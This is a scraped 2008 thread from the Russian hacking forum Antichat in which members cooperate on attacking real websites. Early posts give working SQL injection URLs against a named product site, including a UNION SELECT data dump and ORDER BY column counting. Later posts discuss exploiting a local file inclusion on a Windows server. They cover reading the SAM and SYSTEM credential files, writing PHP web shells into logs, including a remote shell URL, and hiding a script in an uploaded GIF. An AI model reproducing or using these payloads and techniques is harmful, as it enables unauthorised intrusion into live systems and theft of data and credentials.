Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
16.02.2008, 22:55
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
Ищи табы, потом колонки.
Вот что нашел я:
Код:
http://www.umpcportal.com/products/product.php?id=-1+union+select+concat_ws(0x3a,id,name,status)+from+products/*
|
|
|
16.02.2008, 22:58
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Как их искать,если не знаешь,какие(я про таблицы).
|
|
|
|
16.02.2008, 22:59
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от Велемир
Не пойму каким макаром ты подбирал,я через order by пробывал
ОМГ,
http://www.umpcportal.com/products/product.php?id=-161+order+by+38/*
обрати внимание на ошибку вверху страницы
http://www.umpcportal.com/products/product.php?id=-161+order+by+37/*
обрати внимание, что ошибки нет
__________________
Карфаген должен быть разрушен...
|
|
|
|
16.02.2008, 23:05
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Да вот ща ток заметил,там хрен разберёшь- столько ошибок хоть убейсо:Р
|
|
|
|
16.02.2008, 23:11
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
У мя такое ощущение,что есть список таблиц этой версии,ибо сбрутить или догадаться самому это анриал =__________=
|
|
|
|
17.02.2008, 01:20
|
|
Участник форума
Регистрация: 02.06.2006
Сообщений: 241
Провел на форуме:
1703454
Репутация:
142
|
|
лол
есть просто списки как при бруте паса по словарю вот и все, а как назвать таблу - это дело владельца дб
эт всёравно что сказать - есть список всех пасов от инета
|
|
|
|
17.02.2008, 02:51
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Гггг))))).Ясн,всем спасиб :РР
|
|
|
|
18.02.2008, 05:43
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
у меня вопрос: что можно сделать с локальным пхп-инклудом, если:
+инклуд лога я запарол, тепрь там ошибка (error.log и access.log, других там нет).
+загружать на сервер нифига нельзя.
+стоит винда, могу прочесть файлы WINDOWS\repair\sam и C:\WINDOWS\repair\system, но конечно же если их сохранять через страницу - расшифровать их неудастся - повредится структура.
+проверял файл тоталкоммандера - его там нет.
+БД там стоит ibase
Посоветуйте что-нить дельное. Благодарствую!
Последний раз редактировалось o3,14um; 18.02.2008 в 05:48..
|
|
|
|
18.02.2008, 05:58
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
ты уверен, что там локальный инклюд? посмотри еслть ли возможность заливать какие нибудь файлы, картинки и т.п. например аватары залей тогда гифку со скриптом и попробуй ее проинклюдть
__________________
Карфаген должен быть разрушен...
|
|
|
|
18.02.2008, 16:20
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
я же говорю, нихрена нельзя заливать. 100% локальный инклуд.
мот кто знает БД ibase в каком файле пароли хранятся? Щас поищу в инете этот серв, буду сам разбираться, но всерано оставляйте свои предложения.
И Ещё: как правильно в логи шелл записывать? У себя на окалхосте я писал <?system($_POST[cmd])?> и писалось, а на том сервере пришлось вопросики урл-закодировать, но что-то не прокатило (шелл был вида <?include("http://shell")?>? нужно было делать такой <?system($_POST[cmd])?>, но я уже запорол... (пост - потомучто инклуд, с параметрами гет, там почемуто не инклудит - еррор выдает))
ошібка такая:
Parse error: parse error, unexpected T_STRING in C:\Program Files\ХХХ\Apache\logs\error.log on line 45831
Последний раз редактировалось o3,14um; 18.02.2008 в 16:44..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
